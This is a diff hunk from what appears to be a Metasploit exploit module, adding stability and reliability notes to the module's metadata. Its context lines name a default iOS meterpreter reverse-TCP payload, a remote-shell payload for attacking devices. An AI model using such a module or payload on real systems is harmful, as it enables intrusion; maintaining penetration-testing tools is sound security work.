@@ -41,7 +41,12 @@ class MetasploitModule < Msf::Exploit::Remote
         'DefaultTarget' => 0,
         'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/armle/meterpreter_reverse_tcp' },
         'Targets' => [[ 'Automatic', {} ]],
-        'DisclosureDate' => '2016-08-25'
+        'DisclosureDate' => '2016-08-25',
+        'Notes' => {
+          'Stability' => [ CRASH_SERVICE_DOWN ],
+          'SideEffects' => [ ],
+          'Reliability' => [ UNRELIABLE_SESSION ]
+        }
       )
     )
     register_options(
